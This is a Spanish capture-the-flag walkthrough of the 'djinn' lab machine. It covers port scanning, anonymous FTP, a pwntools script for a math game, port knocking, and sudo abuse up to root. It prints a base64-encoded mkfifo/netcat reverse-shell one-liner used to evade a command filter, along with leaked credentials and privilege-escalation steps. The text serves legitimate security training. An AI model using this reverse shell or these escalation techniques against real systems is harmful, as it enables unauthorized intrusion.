Comenzamos con la enumeración de puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.28
❯ nmap -sCV -p21,22,1337,7331 -oN 02-targeted.txt 192.168.1.28
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:26 -03
Nmap scan report for 192.168.1.28
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
22/tcp closed ssh
1337/tcp open waste?
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
Service Info: OS: UnixEl puerto 1337 expone un "juego" de operaciones matemáticas (el fingerprint completo de nmap muestra el banner ASCII); el 7331 es una app Flask/Werkzeug.
Enumeramos la app web y el FTP:
❯ gobuster dir -u 'http://192.168.1.28:7331/' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png -r
...
/wish (Status: 200) [Size: 385]
/genie (Status: 200) [Size: 1676]
...
❯ cat creds.txt
nitu:81299
❯ cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.En /wish hay un campo para ejecutar comandos (limitado). El servicio del puerto 1337 nos pide responder 1000 operaciones matemáticas, así que lo automatizamos con un script en Python usando pwntools:
❯ nc 192.168.1.28 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(6, '-', 6)
>❯ cat answer.py
import pwn
server = '192.168.1.28'
port = '1337'
c = pwn.remote(server,port)
c.recvuntil('gift.\n')
for i in range(1001):
data = c.recvuntil(b")").decode()
c.recv()
num1, num2, todo = int(data[1]), int(data[9]), data[5]
if todo == "+":
answer= num1 + num2
elif todo == '-':
answer= num1 - num2
elif todo == '*':
answer= num1 * num2
elif todo == '/':
answer= num1 / num2
c.send((str(answer) + "\n\r").encode())
print(answer, i)
print(c.recv().decode())La recompensa son tres puertos:
Here is your gift, I hope you know what to do with it:
1356, 6784, 3409Hacemos port knocking en esa secuencia y comprobamos que el puerto 22 se abre:
❯ nmap -p22,1356,6784,3409 192.168.1.28
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 21:42 -03
Nmap scan report for 192.168.1.28
Host is up (0.00013s latency).
PORT STATE SERVICE
22/tcp open ssh
1356/tcp closed cuillamartin
3409/tcp closed networklens
6784/tcp closed bfd-lag
Nmap done: 1 IP address (1 host up) scanned in 0.13 secondsVolvemos a /wish y, codificando en base64 para sortear el filtro, lanzamos una reverse shell:
❯ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.1.10 1234 >/tmp/f" | base64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTkyLjE2
OC4xLjEwIDEyMzQgPi90bXAvZgo=
echo `echo "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDIJjF8bmMgMTkyLjE2OC4xLjEwIDEyMzQgPi90bXAvZgo=" | base64 -d ` | shYa como www-data, en /home/nitish/.dev encontramos las credenciales de nitish:
www-data@djinn:/home/nitish/.dev$ cat creds.txt
nitish:p4ssw0rdStr3r0n9Accedemos por SSH y obtenemos la primera flag. Para movernos a sam, revisamos sudo -l:
nitish@djinn:~$ sudo -l
...
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genieAnalizamos el binario genie y descubrimos un parámetro oculto -cmd (no listado en la ayuda):
nitish@djinn:~$ strings /usr/bin/genie |egrep "^-"
-"M
-v%
--shell
--exec
--god
-cmd
nitish@djinn:~$ sudo -u sam /usr/bin/genie -cmd 1234
my man!!
$ whoami
samObtenemos una shell como sam y revisamos sus permisos:
sam@djinn:/home/sam$ sudo -l
...
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lagolago ofrece un menú con un puzzle ("Guess the number"). Lo ejecutamos en bucle eligiendo la opción 2 hasta ganar la condición de carrera y obtener root:
sam@djinn:/home/sam$ while true;do sudo /root/lago; done
...
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: 2
# whoami
rootObtenemos acceso root y nuestra flag.
Fin.